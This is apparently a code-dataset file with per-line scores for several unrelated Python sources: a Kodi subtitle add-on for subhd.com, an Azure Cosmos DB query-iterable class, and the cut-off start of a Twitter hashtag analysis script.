as file:\n", " generateTables(file, instance.dts, instance)\n", " # Register new output file with RaptorXML engine\n", " job.append_output_filename(path)" ]
[ 0, 0.3333333333333333, 0, 0, 0, 0.3333333333333333, 0, 0.3333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.024390243902439025, 0, 0, 0.07692307692307693, 0, 0.04, 0, 0, 0, 0, 0, 0.043478260869565216, 0, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0, 0, 0, 0.047619047619047616, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.0379746835443038, 0, 0, 0.03488372093023256, 0.1111111111111111, 0.04411764705882353, 0, 0, 0.016129032258064516, 0.02666666666666667, 0, 0.045454545454545456, 0, 0, 0, 0.018518518518518517, 0, 0.015873015873015872, 0.03875968992248062, 0, 0.03409090909090909, 0, 0.02531645569620253, 0, 0, 0.07936507936507936, 0, 0, 0, 0.2, 0, 0, 0, 0.027777777777777776, 0, 0, 0.017857142857142856, 0, 0, 0.010309278350515464, 0.012345679012345678, 0, 0, 0.034482758620689655, 0.1111111111111111, 0, 0, 0.02247191011235955, 0, 0, 0, 0, 0.010526315789473684, 0, 0.011235955056179775, 0, 0, 0, 0.010752688172043012, 0, 0.011235955056179775, 0, 0, 0, 0.07692307692307693, 0.0125, 0, 0, 0, 0.017094017094017096, 0, 0, 0, 0, 0.2, 0, 0, 0.03571428571428571, 0.011235955056179775, 0.013513513513513514, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0.024691358024691357, 0, 0.024096385542168676, 0, 0, 0, 0, 0, 0, 0.2, 0.027777777777777776, 0.023255813953488372, 0.2, 0.05405405405405406, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0.2, 0.04, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0.2, 0.02631578947368421, 0.04081632653061224, 0.2, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0.014084507042253521, 0, 0.024390243902439025, 0.2, 0, 0, 0, 0.013333333333333334, 0, 0, 0, 0.010869565217391304, 0, 0.030303030303030304, 0, 0, 0, 0.009259259259259259, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012658227848101266, 0, 0, 0.02027027027027027, 0, 0, 0, 0, 0.2, 0, 0.2, 0.03409090909090909, 0.027586206896551724, 0.2, 0.024390243902439025, 0, 0, 0, 0, 0, 0, 0, 0, 0.019417475728155338, 0, 0.013986013986013986, 0.020833333333333332, 0.02040816326530612, 0.01694915254237288, 0.0196078431372549, 0.021739130434782608, 0.01904761904761905, 0, 0, 0, 0, 0, 0, 0, 0, 0.009900990099009901, 0, 0, 0.010752688172043012, 0, 0.043859649122807015, 0, 0, 0, 0, 0.01904761904761905, 0, 0, 0, 0, 0, 0, 0.01, 0.02702702702702703, 0, 0, 0.017543859649122806, 0.03225806451612903, 0, 0, 0.025 ]
304
0.019153
false
# -*- coding: utf-8 -*- import re import os import sys import xbmc import urllib import urllib2 import xbmcvfs import xbmcaddon import xbmcgui,xbmcplugin from bs4 import BeautifulSoup __addon__ = xbmcaddon.Addon() __author__ = __addon__.getAddonInfo('author') __scriptid__ = __addon__.getAddonInfo('id') __scriptname__ = __addon__.getAddonInfo('name') __version__ = __addon__.getAddonInfo('version') __language__ = __addon__.getLocalizedString __cwd__ = xbmc.translatePath( __addon__.getAddonInfo('path') ).decode("utf-8") __profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode("utf-8") __resource__ = xbmc.translatePath( os.path.join( __cwd__, 'resources', 'lib' ) ).decode("utf-8") __temp__ = xbmc.translatePath( os.path.join( __profile__, 'temp') ).decode("utf-8") sys.path.append (__resource__) SUBHD_API = 'http://www.subhd.com/search/%s' SUBHD_BASE = 'http://www.subhd.com' UserAgent = 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)' def log(module, msg): xbmc.log((u"%s::%s - %s" % (__scriptname__,module,msg,)).encode('utf-8'),level=xbmc.LOGDEBUG ) def normalizeString(str): return str def GetHttpData(url, data=''): if data: req = urllib2.Request(url, data) else: req = urllib2.Request(url) req.add_header('User-Agent', UserAgent) try: response = urllib2.urlopen(req) httpdata = response.read() response.close() except: log(__name__, "%s (%d) [%s]" % ( sys.exc_info()[2].tb_frame.f_code.co_name, sys.exc_info()[2].tb_lineno, sys.exc_info()[1] )) return '' return httpdata def Search( item ): subtitles_list = [] log( __name__ ,"Search for [%s] by name" % (os.path.basename( item['file_original_path'] ),)) if item['mansearch']: search_string = item['mansearchstr'] elif len(item['tvshow']) > 0: search_string = "%s S%.2dE%.2d" % (item['tvshow'], int(item['season']), int(item['episode']),) else: search_string = item['title'] url = SUBHD_API % (urllib.quote(search_string)) data = GetHttpData(url) try: soup = BeautifulSoup(data) except: return results = soup.find_all("div", class_="box") for it in results: link = SUBHD_BASE + it.find("div", class_="d_title").a.get('href').encode('utf-8') #version = it.find(text=re.compile('(字幕翻译|听译版本|机翻版本|官方译本)'.decode('utf-8'))).parent.get('title').encode('utf-8') version = it.find_all("span", class_=re.compile("label"))[-1].get('title').encode('utf-8') if version: if version.find('本字幕按 ') == 0: version = version.split()[1] else: version = '未知版本' try: r2 = it.find_all("span", class_="label") langs = [x.text.encode('utf-8') for x in r2][:-1] except: langs = '未知' name = '%s (%s)' % (version, ",".join(langs)) if ('英文' in langs) and not(('简体' in langs) or ('繁体' in langs)): subtitles_list.append({"language_name":"English", "filename":name, "link":link, "language_flag":'en', "rating":"0", "lang":langs}) else: subtitles_list.append({"language_name":"Chinese", "filename":name, "link":link, "language_flag":'zh', "rating":"0", "lang":langs}) if subtitles_list: for it in subtitles_list: listitem = xbmcgui.ListItem(label=it["language_name"], label2=it["filename"], iconImage=it["rating"], thumbnailImage=it["language_flag"] ) listitem.setProperty( "sync", "false" ) listitem.setProperty( "hearing_imp", "false" ) url = "plugin://%s/?action=download&link=%s&lang=%s" % (__scriptid__, it["link"], it["lang"] ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=listitem,isFolder=False) def rmtree(path): if isinstance(path, unicode): path = path.encode('utf-8') dirs, files = xbmcvfs.listdir(path) for dir in dirs: rmtree(os.path.join(path, dir)) for file in files: xbmcvfs.delete(os.path.join(path, file)) xbmcvfs.rmdir(path) def Download(url,lang): try: rmtree(__temp__) except: pass try: os.makedirs(__temp__) except: pass subtitle_list = [] exts = [".srt", ".sub", ".txt", ".smi", ".ssa", ".ass" ] try: data = GetHttpData(url) soup = BeautifulSoup(data) id = soup.find("button", class_="btn btn-danger btn-sm").get("sid").encode('utf-8') url = "http://subhd.com/ajax/down_ajax" values = {'sub_id':id} para = urllib.urlencode(values) data = GetHttpData(url, para) match = re.compile('"url":"([^"]+)"').search(data) url = match.group(1).replace(r'\/','/').decode("unicode-escape").encode('utf-8') if url[:4] <> 'http': url = 'http://subhd.com%s' % (url) data = GetHttpData(url) except: return [] if len(data) < 1024: return [] zip = os.path.join(__temp__, "subtitles%s" % os.path.splitext(url)[1]) with open(zip, "wb") as subFile: subFile.write(data) subFile.close() xbmc.sleep(500) if data[:4] == 'Rar!' or data[:2] == 'PK': xbmc.executebuiltin(('XBMC.Extract("%s","%s")' % (zip,__temp__,)).encode('utf-8'), True) path = __temp__ dirs, files = xbmcvfs.listdir(path) if len(dirs) > 0: path = os.path.join(__temp__, dirs[0].decode('utf-8')) dirs, files = xbmcvfs.listdir(path) list = [] for subfile in files: if (os.path.splitext( subfile )[1] in exts): list.append(subfile.decode('utf-8')) if len(list) == 1: subtitle_list.append(os.path.join(path, list[0])) else: sel = xbmcgui.Dialog().select('请选择压缩包中的字幕', list) if sel == -1: sel = 0 subtitle_list.append(os.path.join(path, list[sel])) return subtitle_list def get_params(): param=[] paramstring=sys.argv[2] if len(paramstring)>=2: params=paramstring cleanedparams=params.replace('?','') if (params[len(params)-1]=='/'): params=params[0:len(params)-2] pairsofparams=cleanedparams.split('&') param={} for i in range(len(pairsofparams)): splitparams={} splitparams=pairsofparams[i].split('=') if (len(splitparams))==2: param[splitparams[0]]=splitparams[1] return param params = get_params() if params['action'] == 'search' or params['action'] == 'manualsearch': item = {} item['temp'] = False item['rar'] = False item['mansearch'] = False item['year'] = xbmc.getInfoLabel("VideoPlayer.Year") # Year item['season'] = str(xbmc.getInfoLabel("VideoPlayer.Season")) # Season item['episode'] = str(xbmc.getInfoLabel("VideoPlayer.Episode")) # Episode item['tvshow'] = normalizeString(xbmc.getInfoLabel("VideoPlayer.TVshowtitle")) # Show item['title'] = normalizeString(xbmc.getInfoLabel("VideoPlayer.OriginalTitle")) # try to get original title item['file_original_path'] = urllib.unquote(xbmc.Player().getPlayingFile().decode('utf-8')) # Full path of a playing file item['3let_language'] = [] if 'searchstring' in params: item['mansearch'] = True item['mansearchstr'] = params['searchstring'] for lang in urllib.unquote(params['languages']).decode('utf-8').split(","): item['3let_language'].append(xbmc.convertLanguage(lang,xbmc.ISO_639_2)) if item['title'] == "": item['title'] = xbmc.getInfoLabel("VideoPlayer.Title") # no original title, get just Title if item['title'] == os.path.basename(xbmc.Player().getPlayingFile()): # get movie title and year if is filename title, year = xbmc.getCleanMovieTitle(item['title']) item['title'] = normalizeString(title.replace('[','').replace(']','')) item['year'] = year if item['episode'].lower().find("s") > -1: # Check if season is "Special" item['season'] = "0" # item['episode'] = item['episode'][-1:] if ( item['file_original_path'].find("http") > -1 ): item['temp'] = True elif ( item['file_original_path'].find("rar://") > -1 ): item['rar'] = True item['file_original_path'] = os.path.dirname(item['file_original_path'][6:]) elif ( item['file_original_path'].find("stack://") > -1 ): stackPath = item['file_original_path'].split(" , ") item['file_original_path'] = stackPath[0][8:] Search(item) elif params['action'] == 'download': subs = Download(params["link"], params["lang"]) for sub in subs: listitem = xbmcgui.ListItem(label=sub) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=sub,listitem=listitem,isFolder=False) xbmcplugin.endOfDirectory(int(sys.argv[1]))
[ "# -*- coding: utf-8 -*-\n", "\n", "import re\n", "import os\n", "import sys\n", "import xbmc\n", "import urllib\n", "import urllib2\n", "import xbmcvfs\n", "import xbmcaddon\n", "import xbmcgui,xbmcplugin\n", "from bs4 import BeautifulSoup\n", "\n", "__addon__ = xbmcaddon.Addon()\n", "__author__ = __addon__.getAddonInfo('author')\n", "__scriptid__ = __addon__.getAddonInfo('id')\n", "__scriptname__ = __addon__.getAddonInfo('name')\n", "__version__ = __addon__.getAddonInfo('version')\n", "__language__ = __addon__.getLocalizedString\n", "\n", "__cwd__ = xbmc.translatePath( __addon__.getAddonInfo('path') ).decode(\"utf-8\")\n", "__profile__ = xbmc.translatePath( __addon__.getAddonInfo('profile') ).decode(\"utf-8\")\n", "__resource__ = xbmc.translatePath( os.path.join( __cwd__, 'resources', 'lib' ) ).decode(\"utf-8\")\n", "__temp__ = xbmc.translatePath( os.path.join( __profile__, 'temp') ).decode(\"utf-8\")\n", "\n", "sys.path.append (__resource__)\n", "\n", "SUBHD_API = 'http://www.subhd.com/search/%s'\n", "SUBHD_BASE = 'http://www.subhd.com'\n", "UserAgent = 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)'\n", "\n", "def log(module, msg):\n", " xbmc.log((u\"%s::%s - %s\" % (__scriptname__,module,msg,)).encode('utf-8'),level=xbmc.LOGDEBUG )\n", "\n", "def normalizeString(str):\n", " return str\n", "\n", "def GetHttpData(url, data=''):\n", " if data:\n", " req = urllib2.Request(url, data)\n", " else:\n", " req = urllib2.Request(url)\n", " req.add_header('User-Agent', UserAgent)\n", " try:\n", " response = urllib2.urlopen(req)\n", " httpdata = response.read()\n", " response.close()\n", " except:\n", " log(__name__, \"%s (%d) [%s]\" % (\n", " sys.exc_info()[2].tb_frame.f_code.co_name,\n", " sys.exc_info()[2].tb_lineno,\n", " sys.exc_info()[1]\n", " ))\n", " return ''\n", " return httpdata\n", "\n", "def Search( item ):\n", " subtitles_list = []\n", "\n", " log( __name__ ,\"Search for [%s] by name\" % (os.path.basename( item['file_original_path'] ),))\n", " if item['mansearch']:\n", " search_string = item['mansearchstr']\n", " elif len(item['tvshow']) > 0:\n", " search_string = \"%s S%.2dE%.2d\" % (item['tvshow'],\n", " int(item['season']),\n", " int(item['episode']),)\n", " else:\n", " search_string = item['title']\n", " url = SUBHD_API % (urllib.quote(search_string))\n", " data = GetHttpData(url)\n", " try:\n", " soup = BeautifulSoup(data)\n", " except:\n", " return\n", " results = soup.find_all(\"div\", class_=\"box\")\n", " for it in results:\n", " link = SUBHD_BASE + it.find(\"div\", class_=\"d_title\").a.get('href').encode('utf-8')\n", " #version = it.find(text=re.compile('(字幕翻译|听译版本|机翻版本|官方译本)'.decode('utf-8'))).parent.get('title').encode('utf-8')\n", " version = it.find_all(\"span\", class_=re.compile(\"label\"))[-1].get('title').encode('utf-8')\n", " if version:\n", " if version.find('本字幕按 ') == 0:\n", " version = version.split()[1]\n", " else:\n", " version = '未知版本'\n", " try:\n", " r2 = it.find_all(\"span\", class_=\"label\")\n", " langs = [x.text.encode('utf-8') for x in r2][:-1]\n", " except:\n", " langs = '未知'\n", " name = '%s (%s)' % (version, \",\".join(langs))\n", " if ('英文' in langs) and not(('简体' in langs) or ('繁体' in langs)):\n", " subtitles_list.append({\"language_name\":\"English\", \"filename\":name, \"link\":link, \"language_flag\":'en', \"rating\":\"0\", \"lang\":langs})\n", " else:\n", " subtitles_list.append({\"language_name\":\"Chinese\", \"filename\":name, \"link\":link, \"language_flag\":'zh', \"rating\":\"0\", \"lang\":langs})\n", "\n", " if subtitles_list:\n", " for it in subtitles_list:\n", " listitem = xbmcgui.ListItem(label=it[\"language_name\"],\n", " label2=it[\"filename\"],\n", " iconImage=it[\"rating\"],\n", " thumbnailImage=it[\"language_flag\"]\n", " )\n", "\n", " listitem.setProperty( \"sync\", \"false\" )\n", " listitem.setProperty( \"hearing_imp\", \"false\" )\n", "\n", " url = \"plugin://%s/?action=download&link=%s&lang=%s\" % (__scriptid__,\n", " it[\"link\"],\n", " it[\"lang\"]\n", " )\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=url,listitem=listitem,isFolder=False)\n", "\n", "def rmtree(path):\n", " if isinstance(path, unicode):\n", " path = path.encode('utf-8')\n", " dirs, files = xbmcvfs.listdir(path)\n", " for dir in dirs:\n", " rmtree(os.path.join(path, dir))\n", " for file in files:\n", " xbmcvfs.delete(os.path.join(path, file))\n", " xbmcvfs.rmdir(path) \n", "\n", "def Download(url,lang):\n", " try: rmtree(__temp__)\n", " except: pass\n", " try: os.makedirs(__temp__)\n", " except: pass\n", "\n", " subtitle_list = []\n", " exts = [\".srt\", \".sub\", \".txt\", \".smi\", \".ssa\", \".ass\" ]\n", " try:\n", " data = GetHttpData(url)\n", " soup = BeautifulSoup(data)\n", " id = soup.find(\"button\", class_=\"btn btn-danger btn-sm\").get(\"sid\").encode('utf-8')\n", " url = \"http://subhd.com/ajax/down_ajax\"\n", " values = {'sub_id':id}\n", " para = urllib.urlencode(values)\n", " data = GetHttpData(url, para)\n", " match = re.compile('\"url\":\"([^\"]+)\"').search(data)\n", " url = match.group(1).replace(r'\\/','/').decode(\"unicode-escape\").encode('utf-8')\n", " if url[:4] <> 'http':\n", " url = 'http://subhd.com%s' % (url)\n", " data = GetHttpData(url)\n", " except:\n", " return []\n", " if len(data) < 1024:\n", " return []\n", " zip = os.path.join(__temp__, \"subtitles%s\" % os.path.splitext(url)[1])\n", " with open(zip, \"wb\") as subFile:\n", " subFile.write(data)\n", " subFile.close()\n", " xbmc.sleep(500)\n", " if data[:4] == 'Rar!' or data[:2] == 'PK':\n", " xbmc.executebuiltin(('XBMC.Extract(\"%s\",\"%s\")' % (zip,__temp__,)).encode('utf-8'), True)\n", " path = __temp__\n", " dirs, files = xbmcvfs.listdir(path)\n", " if len(dirs) > 0:\n", " path = os.path.join(__temp__, dirs[0].decode('utf-8'))\n", " dirs, files = xbmcvfs.listdir(path)\n", " list = []\n", " for subfile in files:\n", " if (os.path.splitext( subfile )[1] in exts):\n", " list.append(subfile.decode('utf-8'))\n", " if len(list) == 1:\n", " subtitle_list.append(os.path.join(path, list[0]))\n", " else:\n", " sel = xbmcgui.Dialog().select('请选择压缩包中的字幕', list)\n", " if sel == -1:\n", " sel = 0\n", " subtitle_list.append(os.path.join(path, list[sel]))\n", "\n", " return subtitle_list\n", "\n", "def get_params():\n", " param=[]\n", " paramstring=sys.argv[2]\n", " if len(paramstring)>=2:\n", " params=paramstring\n", " cleanedparams=params.replace('?','')\n", " if (params[len(params)-1]=='/'):\n", " params=params[0:len(params)-2]\n", " pairsofparams=cleanedparams.split('&')\n", " param={}\n", " for i in range(len(pairsofparams)):\n", " splitparams={}\n", " splitparams=pairsofparams[i].split('=')\n", " if (len(splitparams))==2:\n", " param[splitparams[0]]=splitparams[1]\n", "\n", " return param\n", "\n", "params = get_params()\n", "if params['action'] == 'search' or params['action'] == 'manualsearch':\n", " item = {}\n", " item['temp'] = False\n", " item['rar'] = False\n", " item['mansearch'] = False\n", " item['year'] = xbmc.getInfoLabel(\"VideoPlayer.Year\") # Year\n", " item['season'] = str(xbmc.getInfoLabel(\"VideoPlayer.Season\")) # Season\n", " item['episode'] = str(xbmc.getInfoLabel(\"VideoPlayer.Episode\")) # Episode\n", " item['tvshow'] = normalizeString(xbmc.getInfoLabel(\"VideoPlayer.TVshowtitle\")) # Show\n", " item['title'] = normalizeString(xbmc.getInfoLabel(\"VideoPlayer.OriginalTitle\")) # try to get original title\n", " item['file_original_path'] = urllib.unquote(xbmc.Player().getPlayingFile().decode('utf-8')) # Full path of a playing file\n", " item['3let_language'] = []\n", "\n", " if 'searchstring' in params:\n", " item['mansearch'] = True\n", " item['mansearchstr'] = params['searchstring']\n", "\n", " for lang in urllib.unquote(params['languages']).decode('utf-8').split(\",\"):\n", " item['3let_language'].append(xbmc.convertLanguage(lang,xbmc.ISO_639_2))\n", "\n", " if item['title'] == \"\":\n", " item['title'] = xbmc.getInfoLabel(\"VideoPlayer.Title\") # no original title, get just Title\n", " if item['title'] == os.path.basename(xbmc.Player().getPlayingFile()): # get movie title and year if is filename\n", " title, year = xbmc.getCleanMovieTitle(item['title'])\n", " item['title'] = normalizeString(title.replace('[','').replace(']',''))\n", " item['year'] = year\n", "\n", " if item['episode'].lower().find(\"s\") > -1: # Check if season is \"Special\"\n", " item['season'] = \"0\" #\n", " item['episode'] = item['episode'][-1:]\n", "\n", " if ( item['file_original_path'].find(\"http\") > -1 ):\n", " item['temp'] = True\n", "\n", " elif ( item['file_original_path'].find(\"rar://\") > -1 ):\n", " item['rar'] = True\n", " item['file_original_path'] = os.path.dirname(item['file_original_path'][6:])\n", "\n", " elif ( item['file_original_path'].find(\"stack://\") > -1 ):\n", " stackPath = item['file_original_path'].split(\" , \")\n", " item['file_original_path'] = stackPath[0][8:]\n", "\n", " Search(item)\n", "\n", "elif params['action'] == 'download':\n", " subs = Download(params[\"link\"], params[\"lang\"])\n", " for sub in subs:\n", " listitem = xbmcgui.ListItem(label=sub)\n", " xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]),url=sub,listitem=listitem,isFolder=False)\n", "\n", "xbmcplugin.endOfDirectory(int(sys.argv[1]))\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0.02, 0.021739130434782608, 0, 0.0196078431372549, 0.021739130434782608, 0, 0.046511627906976744, 0.0449438202247191, 0.06060606060606061, 0.05555555555555555, 0, 0.03225806451612903, 0, 0.021739130434782608, 0, 0.0125, 0, 0.045454545454545456, 0.050505050505050504, 0, 0.038461538461538464, 0, 0, 0.03225806451612903, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0.15, 0, 0, 0.061224489795918366, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0.01098901098901099, 0.01652892561983471, 0.010101010101010102, 0, 0, 0, 0, 0, 0, 0, 0, 0.0625, 0, 0, 0, 0.04895104895104895, 0, 0.04895104895104895, 0, 0, 0, 0, 0.017543859649122806, 0.017241379310344827, 0.014492753623188406, 0.027777777777777776, 0, 0.038461538461538464, 0.03389830508474576, 0, 0.012195121951219513, 0.023809523809523808, 0.024096385542168676, 0.013513513513513514, 0.03773584905660377, 0, 0.05555555555555555, 0, 0, 0, 0, 0, 0, 0, 0.04, 0, 0.08333333333333333, 0.038461538461538464, 0.11764705882352941, 0.03225806451612903, 0.11764705882352941, 0, 0, 0.01639344262295082, 0, 0, 0, 0.010869565217391304, 0, 0.03225806451612903, 0, 0, 0, 0.02247191011235955, 0.03333333333333333, 0, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.020618556701030927, 0, 0, 0, 0, 0, 0, 0, 0.03773584905660377, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.05555555555555555, 0.07692307692307693, 0.03571428571428571, 0.03571428571428571, 0.037037037037037035, 0.044444444444444446, 0.024390243902439025, 0.023255813953488372, 0.02127659574468085, 0.058823529411764705, 0, 0.037037037037037035, 0.019230769230769232, 0.02631578947368421, 0.018867924528301886, 0, 0, 0, 0.045454545454545456, 0, 0, 0.02564102564102564, 0.02564102564102564, 0.02564102564102564, 0.019230769230769232, 0.018867924528301886, 0.018691588785046728, 0.019230769230769232, 0.024, 0.007874015748031496, 0.027777777777777776, 0, 0, 0, 0, 0, 0, 0.0125, 0, 0, 0.01639344262295082, 0.0078125, 0, 0.03614457831325301, 0, 0, 0.008547008547008548, 0.011363636363636364, 0, 0, 0.03508771929824561, 0, 0, 0.03278688524590164, 0.03571428571428571, 0.011764705882352941, 0, 0.031746031746031744, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.0392156862745098, 0, 0 ]
243
0.013297
false
# The MIT License (MIT) # Copyright (c) 2014 Microsoft Corporation # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. """Iterable query results in the Azure Cosmos database service. """ from azure.core.paging import PageIterator # type: ignore from azure.cosmos._execution_context import execution_dispatcher # pylint: disable=protected-access class QueryIterable(PageIterator): """Represents an iterable object of the query results. QueryIterable is a wrapper for query execution context. """ def __init__( self, client, query, options, fetch_function=None, collection_link=None, database_link=None, partition_key=None, continuation_token=None, ): """Instantiates a QueryIterable for non-client side partitioning queries. _ProxyQueryExecutionContext will be used as the internal query execution context. :param CosmosClient client: Instance of document client. :param (str or dict) query: :param dict options: The request options for the request. :param method fetch_function: :param method resource_type: The type of the resource being queried :param str resource_link: If this is a Document query/feed collection_link is required. Example of `fetch_function`: >>> def result_fn(result): >>> return result['Databases'] """ self._client = client self.retry_options = client.connection_policy.RetryOptions self._query = query self._options = options if continuation_token: options['continuation'] = continuation_token self._fetch_function = fetch_function self._collection_link = collection_link self._database_link = database_link self._partition_key = partition_key self._ex_context = execution_dispatcher._ProxyQueryExecutionContext( self._client, self._collection_link, self._query, self._options, self._fetch_function ) super(QueryIterable, self).__init__(self._fetch_next, self._unpack, continuation_token=continuation_token) def _unpack(self, block): continuation = None if self._client.last_response_headers: continuation = self._client.last_response_headers.get("x-ms-continuation") or \ self._client.last_response_headers.get('etag') if block: self._did_a_call_already = False return continuation, block def _fetch_next(self, *args): # pylint: disable=unused-argument """Return a block of results with respecting retry policy. This method only exists for backward compatibility reasons. (Because QueryIterable has exposed fetch_next_block api). :return: List of results. :rtype: list """ block = self._ex_context.fetch_next_block() if not block: raise StopIteration return block
[ "# The MIT License (MIT)\n", "# Copyright (c) 2014 Microsoft Corporation\n", "\n", "# Permission is hereby granted, free of charge, to any person obtaining a copy\n", "# of this software and associated documentation files (the \"Software\"), to deal\n", "# in the Software without restriction, including without limitation the rights\n", "# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n", "# copies of the Software, and to permit persons to whom the Software is\n", "# furnished to do so, subject to the following conditions:\n", "\n", "# The above copyright notice and this permission notice shall be included in all\n", "# copies or substantial portions of the Software.\n", "\n", "# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n", "# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n", "# SOFTWARE.\n", "\n", "\"\"\"Iterable query results in the Azure Cosmos database service.\n", "\"\"\"\n", "from azure.core.paging import PageIterator # type: ignore\n", "from azure.cosmos._execution_context import execution_dispatcher\n", "\n", "# pylint: disable=protected-access\n", "\n", "\n", "class QueryIterable(PageIterator):\n", " \"\"\"Represents an iterable object of the query results.\n", "\n", " QueryIterable is a wrapper for query execution context.\n", " \"\"\"\n", "\n", " def __init__(\n", " self,\n", " client,\n", " query,\n", " options,\n", " fetch_function=None,\n", " collection_link=None,\n", " database_link=None,\n", " partition_key=None,\n", " continuation_token=None,\n", " ):\n", " \"\"\"Instantiates a QueryIterable for non-client side partitioning queries.\n", "\n", " _ProxyQueryExecutionContext will be used as the internal query execution\n", " context.\n", "\n", " :param CosmosClient client: Instance of document client.\n", " :param (str or dict) query:\n", " :param dict options: The request options for the request.\n", " :param method fetch_function:\n", " :param method resource_type: The type of the resource being queried\n", " :param str resource_link: If this is a Document query/feed collection_link is required.\n", "\n", " Example of `fetch_function`:\n", "\n", " >>> def result_fn(result):\n", " >>> return result['Databases']\n", "\n", " \"\"\"\n", " self._client = client\n", " self.retry_options = client.connection_policy.RetryOptions\n", " self._query = query\n", " self._options = options\n", " if continuation_token:\n", " options['continuation'] = continuation_token\n", " self._fetch_function = fetch_function\n", " self._collection_link = collection_link\n", " self._database_link = database_link\n", " self._partition_key = partition_key\n", " self._ex_context = execution_dispatcher._ProxyQueryExecutionContext(\n", " self._client, self._collection_link, self._query, self._options, self._fetch_function\n", " )\n", " super(QueryIterable, self).__init__(self._fetch_next, self._unpack, continuation_token=continuation_token)\n", "\n", " def _unpack(self, block):\n", " continuation = None\n", " if self._client.last_response_headers:\n", " continuation = self._client.last_response_headers.get(\"x-ms-continuation\") or \\\n", " self._client.last_response_headers.get('etag')\n", " if block:\n", " self._did_a_call_already = False\n", " return continuation, block\n", "\n", " def _fetch_next(self, *args): # pylint: disable=unused-argument\n", " \"\"\"Return a block of results with respecting retry policy.\n", "\n", " This method only exists for backward compatibility reasons. (Because\n", " QueryIterable has exposed fetch_next_block api).\n", "\n", " :return: List of results.\n", " :rtype: list\n", " \"\"\"\n", " block = self._ex_context.fetch_next_block()\n", " if not block:\n", " raise StopIteration\n", " return block\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01020408163265306, 0, 0.008695652173913044, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
101
0.000763
false
import nltk import csv import pymysql import MySQLdb import sys import string import pickle import io #crawled_tags = ["runtastic", "running", "gym", "workout"] hostname = 'localhost' username = 'root' password = '' database = 'twitterdata_4' #tag_dict[crawled_tag][other_tag] = counter of occurrences tag_dict = {} #key words for keyword based filtering keywords = {'healthy': ['health', 'healthy'], 'active': ['doing', 'workout', 'playing', 'hardwork', 'fit', 'active', 'fitness'], 'passive': ['watching', 'beer', 'tv', 'couch', 'lazy', 'superbowl', 'wm', 'cheering', 'relax', 'relaxing', 'mlb'], 'food': ['food', 'eating', 'eat', 'meal', 'cook', 'cooking', 'yummy', 'foodporn', 'dinner', 'breakfast', 'delicious', 'lunch', 'restaurant', 'veggies', 'fruit', 'vegetables', 'nom', 'nomnom', 'foodgasm', 'fruits', 'healthyfood'], 'kind_of_sport': ['football', 'soccer', 'baseball', 'volleyball', 'basketball', 'golf', 'quidditch', 'swimming', 'running', 'cycling', 'boxing', 'lacrosse', 'cricket', 'tennis', 'athletics', 